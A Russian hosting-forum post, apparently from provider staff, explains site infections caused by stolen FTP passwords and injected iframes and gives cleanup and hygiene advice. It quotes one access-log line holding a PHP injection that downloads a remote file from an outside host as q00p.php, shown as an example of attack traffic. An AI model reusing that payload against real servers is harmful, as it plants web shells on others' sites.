kpv
|
![[*]](./images/xmbforum/default_icon.gif) когда размещено 10.4.2007 в 20:41 |
|
|
iframe или "у меня на сайте вирусы!" (старая тема)
Внимание! Актуальная тема тут:
http://forum.ruweb.net/viewthread.php?tid=2896
Нижесказанное писалось в 2007 году, во времена эпохи Windows XP. Нельзя не отметить, что сейчас (в 2014-м) безопасность подтянулась на уровне системы,
и мы уже очень редко сталкиваемся со взломами путем кражи паролей к ftp и размещению на сайтах вирусов, осуществляющих заражение посетителей через
браузеры.
Но, к сожалению, это не означает что вредительского ПО стало меньше, просто изменился характер действий злоумышленников. Все чаще площадка для
размещения сайта используется ими для рассылки спама и осуществления атак на другие сервера, а заражение происходит через уязвимости в CMS сайта. При
этом работоспособность самого сайта не нарушается, и его владелец ни о чем не догадывается, до тех пор пока не получит уведомление от хостера.
Далее - старый текст за 2007 год, который, тем не менее, может оказаться полезен:
----------------------------------------------------------------------------------------
iframe или "у меня на сайте вирусы!"
1. Заходя на свой сайт, пользователь получает предупреждение от антивируса о том что сайт заражен. (Иногда вместо этого отображается просто белая
страница или куски кода на ней.)
2. При просмотре исходного кода страницы обнаруживает чужеродный код (чаще всего заключенный в тэг <iframe>...</iframe>).
В подавляющем большинстве случаев выясняется, что у него были украдены пароли доступа к аккаунту.
Пример кражи ftp-паролей описан здесь:
http://forum.ruweb.net/viewthread.php?tid=2548
ЧТО ДЕЛАТЬ?
1. прежде всего вычистить свой компьютер от различной "заразы", например, установив антивирус со свежими
обновлениями. в критических случаях Вам придётся полностью переустановить систему, так как внедрение вирусов на Ваш компьютер может дойти до такой
степени, что лечению это не поддаётся.
2. поставить ВСЕ ЗАПЛАТКИ (сервис-паки) на свою операционную систему, убирающие уязвимости windows известные компании microsoft до
текущего времени.
3. сменить все свои пароли, в том числе и на почтовые ящики на бесплатных хостингах. пароли, полученные для доступа к нашим услугам,
можете по этим инструкциям
http://forum.ruweb.net/viewthread.php?tid=1829
4. если на сайте используется, в качестве движка, какая-то не самописная CMS, то следует обновиться до актуальной версии.
Вот пример инъекции
| Цитата: |
188.120.239.212 - - [30/Nov/2012:03:11:08 +0300] "GET
/index.php?<?error_reporting(0);print(___);copy('http://desktop-dja-1.ru/go/greed.txt','q00p.php');die;?> HTTP/1.0" 301 - "-" "-"
|
5. заблокировать ftp доступ к сайту. пример для тех серверов, где proftpd:
http://www.proftpd.org/localsite/Userguide/linked/x1021.html
создайте, например, файловым менеджером директадмина
http://site-helper.ru/uploading.html#filemanager
файл .ftpaccess
с таким содержанием
| Цитата: |
<Limit>
DenyAll
</Limit>
|
если же есть полная уверенность, что с Вашей сети, например, заражение не произойдёт, а от всех остальных хотелось бы закрыть доступ, то можете
разрешить доступ с некоторго диапазона адресов, например так
| Цитата: |
<Limit ALL>
Allow 192.168.0.1/32
DenyAll
</Limit>
|
Плагин FTPKey в панели управления DirectAdmin
http://forum.ruweb.net/viewthread.php?tid=2927
Как Не Заразиться И Как Правильно Лечиться
* материал взят из поста ЗАРАЗА на локальном форуме sanet.nnov.ru 25.10.2007
Сейчас поколения троянских программ меняются по несколько раз в сутки, причем некоторых - автоматически при выходе обновленных баз к популярным
антивирусам. Поэтому наличие антивируса, даже регулярно обновляемого, снижает риск, но совсем не гарантирует безопасности. Желательно, соблюдать
элементарные меры гигиены. А именно:
1. Иметь в системе несколько учетных записей. Для работы с Интернет и закачки подозрительного содержимого держать отдельную учетную запись без прав
администратора. Мера по надежности лучше любого антивируса.
2. Загружать исполняемый файлы только из известных и проверенных источников. Если качается какая-то новая программа - найти через Google официальный
сайт и скачать оттуда. Ни в коем разе не с торрентов, тем более внешних, даже если это свежая игрушка. Если по другому ну совсем никак - закачать,
подождать пару дней, проверить свежим антивирусом. Тоже касается кряков к программам.
3. Лучше использовать альтернативный браузер, Mozilla или Opera. Особенно любителям porno, warez, кряков и иже с ним. Ошибок в них не меньше, но
ломают их реже.
4. Обновлять антивирус перед каждым выходом в интернет и не реже чем раз в 3 часа при активном браузинге. Лучше чаще.
5. Использовать какие-либо альтернативы антивирусам. Например http://www.gentlesecurity.com/ - достаточно надежный способ защиты.
6. если на сайте используется, в качестве движка, какая-то не самописная CMS, то следует постоянно читать новости разработчиков и вовремя обновляться
до актуальной версии.
Если все-таки заразились, то лечиться следующим образом. Антивирусом с самыми последними базами (причем иметь ввиду, что Dr.Web, AVG, NOD32, McAfee
работают очень неоперативно, даже если выпускают обновления часто. Kaspersky, Symantec выпускает обновления достаточно шустро. Panda - сносно).
Убедиться, что боновление баз прошло успешно. Лучше скачать пару антивирусов, хотя бы триальных версий того же Касперского.
1. Перегрузиться в безопасный режим. Найти/удалить троянцев.
2. Перегрузиться в обычный режим. Подождать немного.
3. Перегрузиться опять в безопасный режим. Если троянцы опять есть - oops. Если не умеем чистить вручную, то форматируем диск.
4. Достаточно свежая утилитка, можно потестировать:
http://www.online-solutions.ru/osam_autorun.php
5. Для очень продвинутых пользователей - AVZ ( http://www.z-oleg.com/secur/avz/ ).
Обязательно включать AVZGuard.
6. По окончании лечения проверить c:\windows\system32\drivers\etc\hosts - удалить лишние записи.
[Отредактировано 16.8.2015 кто timru]
|
|
|
|
